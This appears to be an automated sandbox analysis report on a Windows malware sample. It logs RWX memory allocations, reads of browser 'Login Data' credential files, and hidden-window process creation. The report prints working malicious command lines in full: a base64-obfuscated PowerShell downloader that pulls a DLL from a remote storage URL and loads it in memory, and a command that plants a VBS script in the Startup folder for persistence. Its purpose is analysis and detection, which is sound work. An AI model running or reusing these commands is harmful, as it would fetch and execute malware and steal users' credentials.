NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0245b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02465000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02466000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028cd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ce000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028cf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Chromium\User Data
file	C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (7 events)

cmdline	cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
cmdline	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/88/251.871.64.891//:ptth'))"
cmdline	cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
cmdline	powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')
cmdline	powershell -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 21, 2023, 6:10 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')" filepath: cmd.exe	1	1
CreateProcessInternalW Sept. 21, 2023, 6:10 p.m.	thread_identifier: 2428 thread_handle: 0x000002a4 process_identifier: 2424 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000300	1	1
ShellExecuteExW Sept. 21, 2023, 6:10 p.m.	show_type: 0 filepath_r: powershell parameters: -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD filepath: powershell	1	1
CreateProcessInternalW Sept. 21, 2023, 6:10 p.m.	thread_identifier: 2520 thread_handle: 0x00000450 process_identifier: 2516 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/88/251.871.64.891//:ptth'))" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000454	1	1

File has been identified by one AntiVirus engine on VirusTotal as malicious (1 event)

Symantec

ISB.Downloader!gen285

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 21, 2023, 6:10 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (50 out of 218 events)

Data received	W
Data received	Se µ=I+ã&0_qï7\|Úþÿ`DOWNGRD 1lkZTP(pþG× µs>ÄjIÚUý¯HTCýµÀ ÿ
Data received	#
Data received
Data received	AÀbÛReOãÆñ0Í/§*£Ó1k8ZU1Ç^k¦«èü³ ó)»;ì(öK»E:bmÆÓ°¾G0E GItÜb@?ØTávì©L¿wz¢È6¥Ô!Õîlóµßï¸¶_tëiÊkîyW´áKô]®K
Data received
Data received
Data received
Data received
Data received	0
Data received	×ìRÁóZÓôÅ¦wÿ¿a^¶¬ûÁLØaÌ·pÞø6¡Q\Võ[V*ûÌzY
Data received	p
Data received	¯töw¯U0´O¨ª[kÇ@ùÜ¶ç¡FÌ+TÅ¾zÑU90²²ßadßðoOrs_ª'7Æ¿øG<,9 ÆF?ñàçv÷kÚ!Íì9BÄíºÀaVãî¢ZÙf,_ßßÆ(ÍÆØÉÚ(H>]Ùd×z{ \c¬ÀýìÞªu3é>©Ñ=ôçýöv°@OR´ê_"úr%ÆÚyx?§Ô4È¦A®âW(]Ü·Å3êUd<"ºäº@xøBò¡mfHÜ;¹Ä[P°ðÞÏñÐ\|â6øÒk;(MYPö1Q$»·Í:øFf~pLËü¢!A_Rª\|{æå_A<ñWTÇlÞ Ä¸fí¦Ïóàµ¢¢nF¥Ö×(úyrÝ9ýh,®ÏÒ·mkwfìch¾¯¦d->R±w û÷êÀlä»L~Ì M¸ÿ[_ö ÕÝª»4Ùð'Z÷ö ¦ä](å«¸yx¡^þ§;½/aeo?èíP!ÃâÓ®#:trÓÂ]Æî\C8þ<¡DÞõ¹¯.0õJk©U{²a¨Ê~b¤õÞïêÝõ\°tòñQâWøþïÎõBQÇÏ¢Xè{Û( Caè[<¦5TÔY%Þ}ÈÛ÷ç!ý¦´×-hñøf87X¶¾¤uú-,ÀòíÿZ²ÐìÝïÇÊH¹¢~`ÂE\|v¡ ;M]ùUÝÓý}q¬¿ôPÚ¹Ç0®«MæõÖeÀ¨`Þý¹(-Ðw8Íur· @ÖóàÄTÃÑ¢O& âÌ·B~@êvªiûYÞ\:N %ñ¥ýìòÓn@SqýÃ¾ 6¿HóÎ¶5Hí /×Í1þ71Ðh¼sé¿b¥!<Ý_çÖ[ëîG´âò«qfL`@]ØM°¥G×Já¢¦Äj4ë&¢\|Ú¢ªü`KêWÎtyÓF\|@(¯0Ì¯sºk>½ yPb´Qø~éÒ«ZJðøêéý^ôácðPÃ ¢2{Qéõû)"ÓûoÃ]Þ¨DãÖs#>çhd ñWkD$ùÿä4Ñ¥_TÃP9ñpëì7L×ÎdJ^7Q·}ÐÉ0çUw& ÝRàÆªvü]¨Xå«¡«t¨p\Å7¦wv³'¬·%TSÝaèy¥\ÂÐÕë°ës9Dy¼ëd3=¬/ìûÞø%NêâS×pË·l×ÖÜåU)e¢SR1+ãîÅW&ß]µ¾fºÈñ54ÍYÿmS\|k/óp=RÊÏÙÔ ýåKv4ýLùíy=åÂvéY/K¿íDOæãcw¾y¡j\|îc$X$·a¶9Tmñ?mY0²àF40]7¬_â bÐãS^yàgtÀµ¶ç<üçåÁ¦Á,Lw[6Ø\|ó`&åcüùÐ}6øýÕ¨Ïú<3¨w«h¯yyÃLã:KÞrzâ»±Ì?]¢<Oæè´Ï±wfõ÷£ÇóþhÒ0¿Ôê,{öê uÿi`Ipú¬%©©fí§ü°Q#ÈÏß(«9%D(Îa>rÎ¼öTÑ\ lªÐgË y:\
